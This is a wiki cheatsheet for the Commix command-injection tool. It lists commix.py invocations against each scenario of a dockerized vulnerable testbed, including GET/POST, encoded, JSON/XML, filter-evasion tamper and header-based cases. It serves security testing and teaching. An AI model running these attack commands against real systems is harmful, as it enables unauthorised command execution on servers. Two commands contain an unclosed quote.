Skip to content

Commix Testbed Cheatsheet

Jump to bottom
Anastasios Stasinopoulos edited this page Mar 5, 2023 · 5 revisions

Note: The following examples are based on dockerized version of Commix-testbed (e.g. http://lab:9090).

1. Regular (GET / POST)

Classic regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic.php?addr=127.0.0.1"

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic.php" --data="addr=127.0.0.1"

Classic (Base64) regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_b64.php?addr=MTI3LjAuMC4x"

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_b64.php" --data="addr=MTI3LjAuMC4x"

Classic (Hex) regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_hex.php?addr=3132372E302E302E31"

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_hex.php" --data="addr=3132372E302E302E31"

Classic single-quote example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_quote.php?addr=127.0.0.1" --level=3

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_quote.php" --data="addr=127.0.0.1" --level=3

Classic double-quote example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_double_quote.php?addr=127.0.0.1" --level=3

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_double_quote.php" --data="addr=127.0.0.1" --level=3

Classic non-space example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_non_space.php?addr=127.0.0.1" --tamper="space2ifs"

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_non_space.php" --data="addr=127.0.0.1" --tamper="space2ifs"

Classic blacklisting example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_blacklisting.php?addr=127.0.0.1"

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_blacklisting.php" --data="addr=127.0.0.1"

Classic hashing example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_hash.php?addr=127.0.0.1"

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_hash.php" --data="addr=127.0.0.1"

Classic example & Basic HTTP authentication exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_basic_auth.php?addr=127.0.0.1" --auth-cred="admin:admin" --auth-type="basic"

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_basic_auth.php" --data="addr=127.0.0.1" --auth-cred="admin:admin" --auth-type="basic"

Classic example & Digest HTTP authentication exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_digest_auth.php?addr=127.0.0.1" --auth-cred="admin:admin" --auth-type="digest"

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_digest_auth.php" --data="addr=127.0.0.1" --auth-cred="admin:admin" --auth-type="digest"

Blind regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/blind.php?addr=127.0.0.1"

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/blind.php" --data="addr=127.0.0.1"

Double Blind regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/double_blind.php?addr=127.0.0.1"

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/double_blind.php" --data="addr=127.0.0.1"

Eval regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/eval.php?user=test"

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/eval.php" --data="user=test"

Eval (Base64) regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/eval_b64.php?user=MTI3LjAuMC4x"

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/eval_b64.php" --data="user=MTI3LjAuMC4x"

Classic (SOAP/XML) regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_xml.php" --data='<?xml version="1.0" encoding="UTF-8"?><ping><addr>localhost</addr><count>1</count></ping>'

Blind (SOAP/XML) regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/blind_xml.php" --data='<?xml version="1.0" encoding="UTF-8"?><ping><addr>localhost</addr><count>1</count></ping>'

Classic (JSON) regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_json.php" --data='{"addr":"test","test":"ancst"}'

Blind (JSON) regular example

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/blind_json.php" --data='{"addr":"test","test":"ancst"}'

Eval (JSON) regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/eval_json.php" --data='{"name":"ancst"}'

Preg_match() regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/preg_match.php?addr=127.0.0.1"
  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/preg_match.php" --data="addr=127.0.0.1"

Preg_match() blind example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/preg_match.php?addr=127.0.0.1"
  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/preg_match.php" --data="addr=127.0.0.1"

Preg_Replace() regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/preg_replace.php?replace=/Hello/&with=Bye" -p with

Assert() regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/assert.php?user=ancst"

Str_Replace() regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/str_replace.php?user=ancst"
  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/str_replace.php" --data="user=ancst"

Create_Function() regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/create_function.php?user=ancst"
  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/create_function.php" --data="user=ancst"

2. Regex Filters

Regex for domain name validation example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/filters/lax_domain_name.php" --data="addr=127.0.0.1" --suffix="d.e.f"

Nested quotes example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/filters/nested_quotes.php" --data="addr=127.0.0.1" --level=3

Regex filter for colon/pipe/ampersand/dollar example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/filters/no_colon_no_pipe_no_ampersand_no_dollar.php"

Regex filter for spaces example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/filters/no_space.php" --data="addr=127.0.0.1" --tamper="space2ifs"

Regex filter for space/colon/pipe/ampersand example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/filters/no_space_no_colon_no_pipe_no_ampersand.php" --data="addr=127.0.0.1" --technique=f --web-root="/var/www/commix-testbed.com/public_html/" --tamper="space2htab

Regex filter for space/colon/pipe/ampersand/dollar example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/filters/no_space_no_colon_no_pipe_no_ampersand_no_dollar.php" --data="addr=127.0.0.1" --technique=f --web-root="/var/www/commix-testbed.com/public_html/" --tamper="space2htab

Regex filter for white chars example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/filters/no_white_chars.php" --data="addr=127.0.0.1" --tamper="space2ifs"

Alphanum for input end example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/filters/simple_stop_alphanum.php" --data="addr=127.0.0.1"

Alphanum for input end (filter for white chars) example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/filters/no_white_chars_stop_alnum.php" --data="addr=127.0.0.1" --tamper="space2ifs"

Alphanum for input start example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/filters/simple_start_alphanum.php" --data="addr=127.0.0.1"

Alphanum for input start (filter for white chars) example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/filters/no_white_chars_start_alphanum.php" --data="addr=127.0.0.1" --tamper="space2ifs"

Regex filter for OS commands (Windows / *nix) example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/filters/multiple_os_commands_blacklisting.php" --data="addr=127.0.0.1" --tamper="uninitializedvariable"

3. User-Agent HTTP Header

Classic user-agent-based example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/user-agent/ua(classic).php" -p user-agent

Blind user-agent-based example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/user-agent/ua(blind).php" -p user-agent

Eval user-agent-based example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/user-agent/ua(eval).php" -p user-agent

4. Cookie HTTP Header

Classic cookie-based example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/cookie/cookie(classic).php" -p addr

Classic cookie-based (Base64) example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/cookie/cookie(b64).php" -p addr

Blind cookie-based example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/cookie/cookie(blind).php" -p addr

Eval cookie-based example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/cookie/cookie(eval).php" -p user

5. Referer HTTP Header

Classic referer-based example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/referer/referer(classic).php" -p referer

Blind referer-based example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/referer/referer(blind).php" -p referer

Eval referer-based example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/referer/referer(eval).php" -p referer
Clone this wiki locally